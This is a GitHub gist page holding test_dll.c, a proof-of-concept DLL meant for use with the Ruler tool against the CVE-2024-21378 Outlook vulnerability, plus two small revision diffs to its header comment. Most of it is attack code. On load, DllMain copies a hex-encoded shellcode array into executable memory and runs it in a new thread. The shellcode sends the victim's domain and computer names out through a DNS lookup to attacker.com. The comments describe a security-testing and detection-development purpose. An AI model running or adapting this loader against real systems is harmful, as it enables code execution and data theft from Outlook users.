Skip to content

Instantly share code, notes, and snippets.

@mostdcoa

mostdcoa/test_dll.c

Forked from Homer28/test_dll.c
Created April 13, 2024 04:40
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save mostdcoa/c20f45e95da5077f1552dd7c413bb96e to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save mostdcoa/c20f45e95da5077f1552dd7c413bb96e to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @Homer28 Homer28 revised this gist Apr 11, 2024. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion test_dll.c
    View file
    Original file line number Diff line number Diff line change
    @@ -5,7 +5,7 @@
    *
    * It can be used with the following command line syntax:
    * ruler [auth-params] form add-com [attack-params] --dll ./test.dll
    * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms
    * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
    *
    * After being loaded into MS Outlook, it sends the PC's hostname and
    * domain name to a DNS resolver and then terminates its execution.
  2. @Homer28 Homer28 revised this gist Apr 11, 2024. 1 changed file with 2 additions and 1 deletion.
    3 changes: 2 additions & 1 deletion test_dll.c
    View file
    Original file line number Diff line number Diff line change
    @@ -5,7 +5,8 @@
    *
    * It can be used with the following command line syntax:
    * ruler [auth-params] form add-com [attack-params] --dll ./test.dll
    *
    * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms
    *
    * After being loaded into MS Outlook, it sends the PC's hostname and
    * domain name to a DNS resolver and then terminates its execution.
    *
  3. @Homer28 Homer28 created this gist Apr 10, 2024.
    203 changes: 203 additions & 0 deletions test_dll.c
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,203 @@
    /**
    * This DLL is designed for use in conjunction with the Ruler tool for
    * security testing related to the CVE-2024-21378 vulnerability,
    * specifically targeting MS Outlook.
    *
    * It can be used with the following command line syntax:
    * ruler [auth-params] form add-com [attack-params] --dll ./test.dll
    *
    * After being loaded into MS Outlook, it sends the PC's hostname and
    * domain name to a DNS resolver and then terminates its execution.
    *
    * Unauthorized use of the DLL for malicious activities is strictly
    * prohibited and may violate applicable laws.
    *
    * The DLL can also be utilized by antivirus software developers for the
    * purpose of developing and testing detection routines.
    * It serves as a practical example for enhancing security measures against
    * the CVE-2024-21378 vulnerability.
    *
    * Authors: @Homer28
    * License: MIT
    *
    */

    #include <windns.h>
    #include <windows.h>
    #include <iostream>

    /**
    * We don't put an arbitrary code into DllMain because it will cause
    * MS Outlook to freeze. Instead, our main payload will be
    * a shellcode that we start in a separate thread.
    *
    * To create the shellcode, we will use the "easy_shellcode_generator" tool.
    * URL: https://github.com/Homer28/easy_shellcode_generator
    *
    * Step-by-step instructions:
    *
    * 1. Install Visual Studio 2022.
    * 2. Insert your C code into the shell_generator.cpp file.
    * 3. Compile the project.
    * 4. Use the pe_converter.py script to extract the shellcode,
    * for example: py ./python/pe_converter.py "../bin/shell_generator.exe" "../bin/shellcode.h"
    *
    * This command can also be executed on Linux. Python3 and the Python3 pefile package are required.
    *
    * 5. Copy the content of shellcode.h below.
    *
    * The below content is the result of compiling following C code.
    * int main(wchar_t *dns_str) {
    * HMODULE mod_kernel32 = getKernel32_by_str();
    *
    * fnGetProcAddress myGetProcAddress = (fnGetProcAddress)getAPIAddr_byStr(mod_kernel32, "getprocaddress");
    * fnLoadLibraryA myLoadLibrary = (fnLoadLibraryA)myGetProcAddress(mod_kernel32, "LoadLibraryA");
    *
    * HMODULE dnsLib = myLoadLibrary("DNSAPI.dll");
    * fnDnsQuery_W myDnsQuery_W = (fnDnsQuery_W)myGetProcAddress(dnsLib, "DnsQuery_W");
    *
    * PDNS_RECORD dnsRecord;
    *
    * myDnsQuery_W(
    * dns_str,
    * DNS_TYPE_A,
    * DNS_QUERY_STANDARD,
    * NULL,
    * &dnsRecord,
    * NULL
    * );
    *
    * return 0;
    * }
    *
    */

    #if _WIN64
    #define ptr_uint uint64_t
    HANDLE g_threadH;
    uint32_t payload_zx = 997;
    uint32_t payload_EP_offset = 0x1A0;
    unsigned char rawData[] = {
    0xa0, 0x11, 0x00, 0x00, 0xcf, 0x13, 0x00, 0x00, 0xd0, 0x13, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32,
    0x2e, 0x64, 0x6c, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x67, 0x65, 0x74, 0x70,
    0x72, 0x6f, 0x63, 0x61, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x00,
    0x4c, 0x6f, 0x61, 0x64, 0x4c, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41,
    0x00, 0x00, 0x00, 0x00, 0x44, 0x4e, 0x53, 0x41, 0x50, 0x49, 0x2e, 0x64,
    0x6c, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x6e, 0x73, 0x51,
    0x75, 0x65, 0x72, 0x79, 0x5f, 0x57, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xef, 0x38, 0x0c, 0x66, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00,
    0x78, 0x00, 0x00, 0x00, 0xa4, 0x10, 0x00, 0x00, 0xa4, 0x02, 0x00, 0x00,
    0x18, 0x00, 0x00, 0x00, 0x02, 0x80, 0x02, 0x80, 0x90, 0x10, 0x00, 0x00,
    0x04, 0x00, 0x00, 0x00, 0x94, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
    0xb5, 0x11, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x5c, 0x00, 0x00, 0x00,
    0x20, 0x11, 0x00, 0x00, 0xc8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x2e, 0x70, 0x64, 0x61,
    0x74, 0x61, 0x00, 0x00, 0x10, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00,
    0x2e, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x78, 0x10, 0x00, 0x00,
    0x2c, 0x00, 0x00, 0x00, 0x2e, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x76,
    0x6f, 0x6c, 0x74, 0x6d, 0x64, 0x00, 0x00, 0x00, 0xa4, 0x10, 0x00, 0x00,
    0x7c, 0x00, 0x00, 0x00, 0x2e, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x7a,
    0x7a, 0x7a, 0x64, 0x62, 0x67, 0x00, 0x00, 0x00, 0x20, 0x11, 0x00, 0x00,
    0xb0, 0x02, 0x00, 0x00, 0x2e, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6d, 0x6e,
    0x00, 0x00, 0x00, 0x00, 0xd0, 0x13, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00,
    0x2e, 0x78, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x44, 0x0f, 0xb6, 0x01, 0x45, 0x84, 0xc0, 0x74, 0x1f, 0x41, 0x0f, 0xb6,
    0xc0, 0x48, 0x2b, 0xca, 0x44, 0x0f, 0xb6, 0xc0, 0x3a, 0x02, 0x75, 0x10,
    0x0f, 0xb6, 0x44, 0x11, 0x01, 0x48, 0xff, 0xc2, 0x44, 0x0f, 0xb6, 0xc0,
    0x84, 0xc0, 0x75, 0xe8, 0x0f, 0xb6, 0x0a, 0x33, 0xd2, 0x8b, 0xc2, 0x44,
    0x3a, 0xc1, 0x0f, 0x97, 0xc0, 0x0f, 0x92, 0xc2, 0x2b, 0xc2, 0xc3, 0xcc,
    0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc,
    0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0x0f, 0xb6, 0x02, 0x84,
    0xc0, 0x74, 0x1a, 0x48, 0x2b, 0xd1, 0x66, 0x0f, 0x1f, 0x44, 0x00, 0x00,
    0x88, 0x01, 0x48, 0x8d, 0x49, 0x01, 0x0f, 0xb6, 0x04, 0x0a, 0x84, 0xc0,
    0x75, 0xf2, 0x88, 0x01, 0xc3, 0x88, 0x01, 0xc3, 0xcc, 0xcc, 0xcc, 0xcc,
    0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
    0x08, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x56, 0x48, 0x81,
    0xec, 0x80, 0x01, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x60, 0x00,
    0x00, 0x00, 0x4c, 0x8b, 0xf1, 0x48, 0x8b, 0x50, 0x18, 0x4c, 0x8b, 0x52,
    0x18, 0x4d, 0x8b, 0xca, 0x0f, 0x1f, 0x40, 0x00, 0x4d, 0x8b, 0x09, 0x49,
    0x83, 0x79, 0x30, 0x00, 0x0f, 0x84, 0x94, 0x00, 0x00, 0x00, 0x45, 0x0f,
    0xb7, 0x41, 0x58, 0x33, 0xd2, 0x4d, 0x85, 0xc0, 0x74, 0x20, 0x66, 0x0f,
    0x1f, 0x44, 0x00, 0x00, 0x48, 0x83, 0xfa, 0x40, 0x73, 0x14, 0x49, 0x8b,
    0x41, 0x60, 0x0f, 0xb6, 0x0c, 0x50, 0x88, 0x4c, 0x14, 0x30, 0x48, 0xff,
    0xc2, 0x49, 0x3b, 0xd0, 0x72, 0xe6, 0x0f, 0xb6, 0x44, 0x24, 0x30, 0x84,
    0xc0, 0x74, 0x1c, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x8d, 0x48, 0xbf, 0x80,
    0xf9, 0x19, 0x77, 0x04, 0x04, 0x20, 0x88, 0x02, 0x0f, 0xb6, 0x42, 0x01,
    0x48, 0xff, 0xc2, 0x84, 0xc0, 0x75, 0xe9, 0x48, 0x8d, 0x0d, 0xda, 0xfd,
    0xff, 0xff, 0xb2, 0x6b, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0x49, 0x2b, 0xc8,
    0x48, 0x8d, 0x44, 0x24, 0x30, 0x44, 0x0f, 0xb6, 0x00, 0x41, 0x3a, 0xd0,
    0x75, 0x10, 0x0f, 0xb6, 0x54, 0x01, 0x01, 0x48, 0xff, 0xc0, 0x84, 0xd2,
    0x75, 0xeb, 0x44, 0x0f, 0xb6, 0x00, 0x33, 0xc9, 0x41, 0x3a, 0xd0, 0x0f,
    0x97, 0xc1, 0x33, 0xc0, 0x41, 0x3a, 0xd0, 0x0f, 0x92, 0xc0, 0x3b, 0xc8,
    0x74, 0x09, 0x4d, 0x3b, 0xd1, 0x0f, 0x85, 0x55, 0xff, 0xff, 0xff, 0x49,
    0x8b, 0x79, 0x30, 0x45, 0x33, 0xd2, 0x48, 0x63, 0x47, 0x3c, 0x8b, 0x8c,
    0x38, 0x88, 0x00, 0x00, 0x00, 0x8b, 0x5c, 0x39, 0x1c, 0x44, 0x8b, 0x5c,
    0x39, 0x20, 0x8b, 0x6c, 0x39, 0x24, 0x4c, 0x03, 0xdf, 0x48, 0x03, 0xef,
    0x48, 0x8d, 0x34, 0x1f, 0x85, 0xdb, 0x0f, 0x84, 0xb2, 0x00, 0x00, 0x00,
    0x4c, 0x8d, 0x0d, 0x6d, 0xfd, 0xff, 0xff, 0x48, 0x8d, 0x44, 0x24, 0x70,
    0x4c, 0x2b, 0xc8, 0x0f, 0x1f, 0x44, 0x00, 0x00, 0x41, 0x8b, 0x13, 0x48,
    0x8d, 0x44, 0x24, 0x70, 0x48, 0x03, 0xd7, 0x0f, 0xb6, 0x0a, 0x84, 0xc9,
    0x74, 0x1b, 0x4c, 0x8d, 0x44, 0x24, 0x70, 0x49, 0x2b, 0xd0, 0x66, 0x0f,
    0x1f, 0x44, 0x00, 0x00, 0x88, 0x08, 0x48, 0xff, 0xc0, 0x0f, 0xb6, 0x0c,
    0x02, 0x84, 0xc9, 0x75, 0xf3, 0x88, 0x08, 0x0f, 0xb6, 0x4c, 0x24, 0x70,
    0x84, 0xc9, 0x74, 0x1f, 0x48, 0x8d, 0x54, 0x24, 0x70, 0x0f, 0x1f, 0x00,
    0x8d, 0x41, 0xbf, 0x3c, 0x19, 0x77, 0x05, 0x80, 0xc1, 0x20, 0x88, 0x0a,
    0x0f, 0xb6, 0x4a, 0x01, 0x48, 0xff, 0xc2, 0x84, 0xc9, 0x75, 0xe9, 0x48,
    0x8d, 0x44, 0x24, 0x70, 0xb2, 0x67, 0x66, 0x90, 0x44, 0x0f, 0xb6, 0x00,
    0x41, 0x3a, 0xd0, 0x75, 0x11, 0x41, 0x0f, 0xb6, 0x54, 0x01, 0x01, 0x48,
    0xff, 0xc0, 0x84, 0xd2, 0x75, 0xea, 0x44, 0x0f, 0xb6, 0x00, 0x33, 0xc9,
    0x41, 0x3a, 0xd0, 0x0f, 0x97, 0xc1, 0x33, 0xc0, 0x41, 0x3a, 0xd0, 0x0f,
    0x92, 0xc0, 0x3b, 0xc8, 0x74, 0x73, 0x41, 0xff, 0xc2, 0x49, 0x83, 0xc3,
    0x04, 0x44, 0x3b, 0xd3, 0x0f, 0x82, 0x62, 0xff, 0xff, 0xff, 0x33, 0xdb,
    0x48, 0x8d, 0x15, 0xc9, 0xfc, 0xff, 0xff, 0x48, 0x8b, 0xcf, 0xff, 0xd3,
    0x48, 0x8d, 0x0d, 0xcd, 0xfc, 0xff, 0xff, 0xff, 0xd0, 0x48, 0x8d, 0x15,
    0xd4, 0xfc, 0xff, 0xff, 0x48, 0x8b, 0xc8, 0xff, 0xd3, 0x48, 0x8d, 0x8c,
    0x24, 0xa8, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
    0x00, 0x00, 0x48, 0x89, 0x4c, 0x24, 0x20, 0xba, 0x01, 0x00, 0x00, 0x00,
    0x49, 0x8b, 0xce, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0xff, 0xd0, 0x4c,
    0x8d, 0x9c, 0x24, 0x80, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x49, 0x8b, 0x5b,
    0x20, 0x49, 0x8b, 0x6b, 0x30, 0x49, 0x8b, 0xe3, 0x41, 0x5e, 0x5f, 0x5e,
    0xc3, 0x42, 0x0f, 0xb7, 0x4c, 0x55, 0x00, 0x8b, 0x1c, 0x8e, 0x48, 0x03,
    0xdf, 0xeb, 0x91, 0xcc, 0x01, 0x15, 0x09, 0x00, 0x15, 0x54, 0x36, 0x00,
    0x15, 0x34, 0x34, 0x00, 0x15, 0x01, 0x30, 0x00, 0x0e, 0xe0, 0x0c, 0x70,
    0xb};
    #else
    #endif

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call,
    LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH: {
    std::wstring dns_resolve_address = L"new.d%USERDOMAIN%.u%COMPUTERNAME%.attacker.com";
    wchar_t dns_name[MAX_PATH];
    if (ExpandEnvironmentStringsW(dns_resolve_address.c_str(), dns_name,
    MAX_PATH)) {
    LPVOID payload_memory = VirtualAlloc(
    NULL, payload_zx, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (payload_memory) {
    memcpy_s(payload_memory, payload_zx, rawData, payload_zx);

    wchar_t* dns_name_allocated = (wchar_t*)VirtualAlloc(
    NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    wcscpy_s(dns_name_allocated, MAX_PATH, dns_name);

    g_threadH = CreateThread(
    NULL, 0,
    (LPTHREAD_START_ROUTINE)((ptr_uint)payload_memory +
    (ptr_uint)payload_EP_offset),
    dns_name_allocated, 0, NULL);
    }
    }
    break;
    }
    case DLL_THREAD_ATTACH:
    break;
    case DLL_THREAD_DETACH:
    break;
    case DLL_PROCESS_DETACH:
    break;
    }
    return TRUE;
    }